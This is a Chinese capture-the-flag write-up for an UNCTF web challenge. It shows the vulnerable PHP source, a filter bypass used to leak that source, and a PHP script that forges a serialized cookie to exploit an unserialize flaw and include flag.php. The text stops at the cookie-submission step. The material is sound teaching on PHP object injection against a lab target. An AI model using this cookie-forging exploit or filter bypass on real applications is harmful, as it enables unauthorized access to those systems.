UNCTF:K&K战队的老家(反序列化|cookie注入)
打开页面,发现只有一个登录框,我们进行注入,使用burpsuite的fuzzing获取登陆的payload
使用页面登录,发现只有一个页面可以打开,打开后提示身份信息有问题
这时候发现了一个参数m,fuzz后发现过滤了php|base64,我们换成大写绕过获取页面源码
将输出的字符串base64解码一下,拿到home的源码:
<?php error_reporting(0); include "./inc/config.php"; $mothed = $_GET["m"] ? $_GET["m"] : "index"; $cookie = $_COOKIE["identy"]; if($mothed == "login") { $username = $_POST["user"]; $userpass = $_POST["pw"]; if($username == "" || $userpass == "") { die('<script>alert("Account or password cannot be empty");window.location.href="./index.php";</script>'); } waf($username); waf($userpass); $db->user_check($username, $userpass, $session); } elseif($mothed == "index") { check($cookie, $db, $session); echo_index(); } elseif($mothed == "logout") { check($cookie, $db, $session); setcookie("identy",""); die('<script>alert("Goodbye");window.location.href="./index.php";</script>'); } else { mothed_waf($mothed); $page = $mothed . ".php"; include($page); check($cookie, $db, $session); $d = new debug($session, $d); $d->vt($session, $d); $d->debug($session); } ?>
继续获config.php和其他页面的源代码
//config.php <?php error_reporting(0); include "session.php"; //include "access.php"; include "func.php"; include "db.php"; $db = new db(); $session = new session(); ?> //session.php <?php error_reporting(0); class session{ public $choose = 1; public $id = 0; public $username = ""; } ?> //func.php <?php error_reporting(0); function waf($str) { //过滤,包含大小写 if(preg_match('/(and|or|if|select|union|sleep|order|group|by|exp|user|from|where|tables|substr|database|join|greatest|like|not|hex|bin|ascii|md5|benchmark|concat|mid|strcmp|left|right|replace|when|\/|=|>|<|\*|\(|\)|~|%|!|&&|,|"|;|#|\^|-)/i', $str) == 1) { die('<script>alert("Illegal");window.location.href="./index.php";</script>'); } } function mothed_waf($str) { //过滤,可转换大小写绕过 if(preg_match('/(base64|php|write)/', $str) == 1) { die('<script>alert("Illegal");window.location.href="./home.php?m=index";</script>'); } //过滤,包含大小写 if(preg_match('/(flag|access)/i', $str) == 1) { die('<script>alert("Illegal");window.location.href="./home.php?m=index";</script>'); } } function cookie_decode($str) { $data = urldecode($str); $data = substr($data, 1); $arr = explode('&', $data); $cipher = ''; foreach($arr as $value) { $num = hexdec($value); $num = $num - 240; $cipher = $cipher.'%'.dechex($num); } $key = urldecode($cipher); $key = base64_decode($key); return $key; } function cookie_encode($str) { $key = base64_encode($str); //base64编码 $key = bin2hex($key); //字符串转16进制 $arr = str_split($key, 2); //分割字符串,每个数组长度为2 $cipher = ''; foreach($arr as $value) { $num = hexdec($value);//十六进制转换为十进制 $num = $num + 240; //将数组转换为10进制后再加上240 $cipher = $cipher.'&'.dechex($num);//十进制转换为十六进制,在进行字符串拼接 } return $cipher; } function check($str, $db, &$session) {//$_COOKIE["identy"],db,session if($str == "") { die('<script>alert("Please login again");window.location.href="./index.php";</script>'); } $objstr = cookie_decode($str);//coodie解码 try { $session = unserialize($objstr); //反序列化cookie ,存在反序列化漏洞 $session->id = intval($session->id); waf($session->username); } catch(Exception $e) { die('<script>alert("Identity problems, please relogin");window.location.href="./index.php";</script>'); } $db->index_check($session->id, $session->username); } function check1($obj) { if($obj->username !== "debuger") { setcookie("identy", ""); die('<script>alert("Identity problems, please relogin");window.location.href="./index.php";</script>'); } } function echo_index() { echo base64_decode("PCFET0NUWVBFIGh0bWw+CjxodG1sPjxoZWFkPjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4KICAgIAogICAgPHRpdGxlPmhvbWU8L3RpdGxlPgogICAgPG1ldGEgbmFtZT0icmVuZGVyZXIiIGNvbnRlbnQ9IndlYmtpdCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UsY2hyb21lPTEiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCBtYXhpbXVtLXNjYWxlPTEiPgogICAgPG1ldGEgbmFtZT0iYXBwbGUtbW9iaWxlLXdlYi1hcHAtc3RhdHVzLWJhci1zdHlsZSIgY29udGVudD0iYmxhY2siPgogICAgPG1ldGEgbmFtZT0iYXBwbGUtbW9iaWxlLXdlYi1hcHAtY2FwYWJsZSIgY29udGVudD0ieWVzIj4KICAgIDxtZXRhIG5hbWU9ImZvcm1hdC1kZXRlY3Rpb24iIGNvbnRlbnQ9InRlbGVwaG9uZT1ubyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Ii4vaG9tZV9maWxlcy9sYXl1aS5jc3MiIG1lZGlhPSJhbGwiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIuL2hvbWVfZmlsZXMvZ2xvYmFsLmNzcyIgbWVkaWE9ImFsbCI+CjxsaW5rIHJlbD0icHJlbG9hZCIgaHJlZj0iLi9ob21lX2ZpbGVzL2YoMSkudHh0IiBhcz0ic2NyaXB0Ij48bGluayByZWw9InByZWxvYWQiIGhyZWY9Ii4vaG9tZV9maWxlcy9mLnR4dCIgYXM9InNjcmlwdCI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iLi9ob21lX2ZpbGVzL2YudHh0Ij48L3NjcmlwdD48L2hlYWQ+Cgo8Ym9keT4KICAgIDxkaXYgY2xhc3M9ImxheXVpLWxheW91dCBsYXl1aS1sYXlvdXQtYWRtaW4iPgogICAgICAgIDxkaXYgY2xhc3M9ImxheXVpLWhlYWRlciBoZWFkZXIgaGVhZGVyLWRlbW8iPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJsYXl1aS1tYWluIj4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJsb2dvIiBocmVmPSIuL2hvbWUucGhwP209aW5kZXgiPgogICAgICA8aW1nIHNyYz0iLi9ob21lX2ZpbGVzL2xvZ28ucG5nIj4KICAgIDwvYT4KICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibGF5dWktbmF2Ij4KICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImxheXVpLW5hdi1pdGVtIGxheXVpLWhpZGUteHMiPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSIuL2hvbWUucGhwP209bG9nb3V0Ij7pgIDlh7rnmbvlvZU8L2E+CiAgICAgICAgICAgICAgICAgICAgPC9saT4KICAgICAgICAgICAgICAgIDxzcGFuIGNsYXNzPSJsYXl1aS1uYXYtYmFyIiBzdHlsZT0ibGVmdDogNThweDsgdG9wOiA1NXB4OyB3aWR0aDogMHB4OyBvcGFjaXR5OiAwOyI+PC9zcGFuPjwvdWw+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImxheXVpLXNpZGUgbGF5dWktYmctYmxhY2siPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJsYXl1aS1zaWRlLXNjcm9sbCI+CiAgICAgICAgICAgICAgICA8dWwgY2xhc3M9ImxheXVpLW5hdiBsYXl1aS1uYXYtdHJlZSBzaXRlLWRlbW8tbmF2IiBsYXktZmlsdGVyPSJkZW1vIj4KICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImxheXVpLW5hdi1pdGVtIGxheXVpLW5hdi1pdGVtZWQiPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBjbGFzcz0iamF2YXNjcmlwdDo7IiBocmVmPSJqYXZhc2NyaXB0OjsiPui1m+ajjeenmOexjTxzcGFuIGNsYXNzPSJsYXl1aS1uYXYtbW9yZSI+PC9zcGFuPjwvYT4KICAgICAgICAgICAgICAgICAgICAgICAgPGRsIGNsYXNzPSJsYXl1aS1uYXYtY2hpbGQiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGRkPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ii4vaG9tZS5waHA/bT1pbmRleCI+5biI5YKF5Lus55qE5paH56ugPC9hPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkZD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSIuL2hvbWUucGhwP209aW5kZXgiPkNURueahOiHquaIkeS/ruWFuzwvYT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iLi9ob21lLnBocD9tPWRlYnVnIj7kv7HkuZDpg6jov5Dnu7TmiYvlhow8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2RkPgogICAgICAgICAgICAgICAgICAgICAgICA8L2RsPgogICAgICAgICAgICAgICAgICAgIDwvbGk+CiAgICAgICAgICAgICAgICAgICAgPC9saT4KICAgICAgICAgICAgICAgICAgICA8L2xpPgogICAgICAgICAgICAgICAgPHNwYW4gY2xhc3M9ImxheXVpLW5hdi1iYXIiIHN0eWxlPSJ0b3A6IDUxNy41cHg7IGhlaWdodDogMHB4OyBvcGFjaXR5OiAwOyI+PC9zcGFuPjwvdWw+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImxheXVpLWJvZHkgc2l0ZS1kZW1vIj4KICAgICAgICAgIDxpbWcgc3JjPSIuL2hvbWVfZmlsZXMv6KeG5Zu+LnBuZyI+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0ibGF5dWktZm9vdGVyIGZvb3RlciBmb290ZXItZGVtbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImxheXVpLW1haW4iPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8c2NyaXB0IHNyYz0iLi9ob21lX2ZpbGVzL2YoMSkudHh0Ij48L3NjcmlwdD48c2NyaXB0IGFzeW5jPSIiIHNyYz0iLi9ob21lX2ZpbGVzL2Fkc2J5Z29vZ2xlLmpzIj48L3NjcmlwdD4KICAgICAgICA8ZGl2IGNsYXNzPSJzaXRlLXRyZWUtbW9iaWxlIGxheXVpLWhpZGUiPgogICAgICAgICAgICA8aSBjbGFzcz0ibGF5dWktaWNvbiI+7piCPC9pPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InNpdGUtbW9iaWxlLXNoYWRlIj48L2Rpdj4KICAgICAgICA8c2NyaXB0IHNyYz0iLi9ob21lX2ZpbGVzL2xheXVpLmpzIiBjaGFyc2V0PSJ1dGYtOCI+PC9zY3JpcHQ+CiAgICAgICAgPHNjcmlwdD4KICAgICAgICBsYXl1aS51c2UoJ2VsZW1lbnQnLCBmdW5jdGlvbigpIHsKICAgICAgICAgICAgdmFyIGVsZW1lbnQgPSBsYXl1aS5lbGVtZW50OwoKICAgICAgICAgICAgZWxlbWVudC5vbignbmF2KGRlbW8pJywgZnVuY3Rpb24oZWxlbSkgewogICAgICAgICAgICAgICAgbGF5ZXIubXNnKGVsZW0udGV4dCgpKTsKICAgICAgICAgICAgfSk7CiAgICAgICAgfSk7CiAgICAgICAgd2luZG93Lmdsb2JhbCA9IHsKICAgICAgICAgICAgcGFnZVR5cGU6ICdkZW1vJywKICAgICAgICAgICAgcHJldmlldzogZnVuY3Rpb24oKSB7CiAgICAgICAgICAgICAgICB2YXIgcHJldmlldyA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdMQVlfcHJldmlldycpOwogICAgICAgICAgICAgICAgcmV0dXJuIHByZXZpZXcgPyBwcmV2aWV3LmlubmVySFRNTCA6ICcnOwogICAgICAgICAgICB9CiAgICAgICAgfTsKICAgICAgICA8L3NjcmlwdD4KICAgIDwvZGl2PgoKCgo8L2JvZHk+PC9odG1sPg=="); } ?> //db.php <?php error_reporting(0); class db{ public function init() { $con = mysql_connect("localhost:3306","dog","123456"); if(!$con) { die("Connect failed: " . mysql_error()); } return $con; } public function user_check($u, $p, $obj) {//设置cookie的方法 $sql = "SELECT id,username FROM users WHERE username = '$u' and password = '$p'"; $con = $this->init(); mysql_select_db("unctf", $con); $result = mysql_query($sql,$con); $row = mysql_fetch_array($result); if(count($row) >= 4) { $obj->id = intval($row['id']); //1.session的id赋值。 intval()函数默认转成10进制 $obj->username = $row['username'];//2.session的username赋值 $serstr = serialize($obj); // 3.序列化session对象 } $serstr = cookie_encode($serstr); setcookie('identy', $serstr); echo('<script>alert("Login Success");window.location.href="./home.php?m=index";</script>'); } else { die('<script>alert("Login Fail");window.location.href="./index.php";</script>'); } } public function index_check($i, $u) { $sql = "SELECT id,username FROM users WHERE username = '$u' and id = $i"; $con = $this->init(); mysql_select_db("unctf", $con); $result = mysql_query($sql,$con); $row = mysql_fetch_array($result); if(count($row) < 4) { setcookie("identy", ""); die('<script>alert("Identity problems, please relogin");window.location.href="./index.php";</script>'); } } } ?> //access.php.bak <?php error_reporting(0); $hack_token = '3ecReK&key'; try { $d = unserialize($this->funny); } catch(Exception $e) { echo ''; } ?> //debug.php <?php error_reporting(0); class debug{ public $choose = 0; public $forbidden = "Good Luck :|"; public $access_token = ""; public $ob = NULL; public function __construct($obj, &$d) {//$session, $d $this->vt($obj, $d); if($this->ob->username !== "debuger") { setcookie("identy", ""); die('<script>alert("Identity problems, please relogin");window.location.href="./index.php";</script>'); } } public function vt($obj, &$d) { //$session, $d if($this->ob != $obj) { $this->ob = $obj; //ojb=session } if(!($obj instanceof session)) {//判断obj是不是session的实例 $d = $obj; //token=session } } public function __toString() {//当一个对象被当作字符串对待的时候,会触发这个魔术方法 if($this->access_token === "") {//这里注意反序列化后access_token要为“”,否则不会包含flag.php文件 include("flag.php"); } } public function debug($obj, &$d) { $this->vt($obj, $d); check1($this->ob); //检查username是否为debuger,这里要相等 if($this->choose === 0) { $this->choose = $this->ob->choose; //ob=session,session要传入choose=2,但是要不能进入下面的die()函数,使用字符串 "2" 绕过 } if($this->choose !== 1) { if($this->choose === 2) { die('<script>alert("This is a forbidden option");window.location.href="./home.php?m=debug";</script>'); } } switch($this->choose)//switch非严格匹配,自动转换类型 { case 1: echo "You like hsy :("; break; case 2: echo $this->forbidden;//这里触发__toString()方法,构造forbidden为debug类的对象,echo即可触发 break; default: echo "Good debuger :)"; } } public function __destruct() { echo ''; } } ?>
(这里的access.php.bak是审计代码后fuzz发现的文件)
审计代码后编写php脚本构造cookie(funny参数是前面fuzz获取到的一个参数,需要构造传入一个access_token 才能得到flag文件)
<?php class debug{ public $forbidden = ""; public $access_token = ""; public $ob = NULL; public $choose = "2"; public $id = 2; public $username = "debuger"; public $funny='O:5:"debug":4:{s:6:"choose";s:1:"2";s:9:"forbidden";s:0:"";s:12:"access_token";s:10:"3ecReK&key";s:2:"ob";N;}'; public function __construct() { $this->forbidden = unserialize('O:5:"debug":4:{s:6:"choose";s:1:"2";s:9:"forbidden";s:0:"";s:12:"access_token";s:0:"";s:2:"ob";N;}'); } } function cookie_encode($str) { $key = base64_encode($str); //base64编码 $key = bin2hex($key); //字符串转16进制 $arr = str_split($key, 2); //分割字符串,每个数组长度为2 $cipher = ''; foreach($arr as $value) { $num = hexdec($value);//十六进制转换为十进制 $num = $num + 240; //将数组转换为10进制后再加上240 $cipher = $cipher.'&'.dechex($num);//十进制转换为十六进制,在进行字符串拼接 } return $cipher; } $a=new debug(); $serstr = serialize($a); $serstr = cookie_encode($serstr); echo $serstr; ?>
注意这里$funny要传入access_token,而$forbidden 的access_token要为空,不然不会包含flag.php文件
将脚本获取的cookie使用url编码,用BurpSuite抓包更改Cookie的identy:
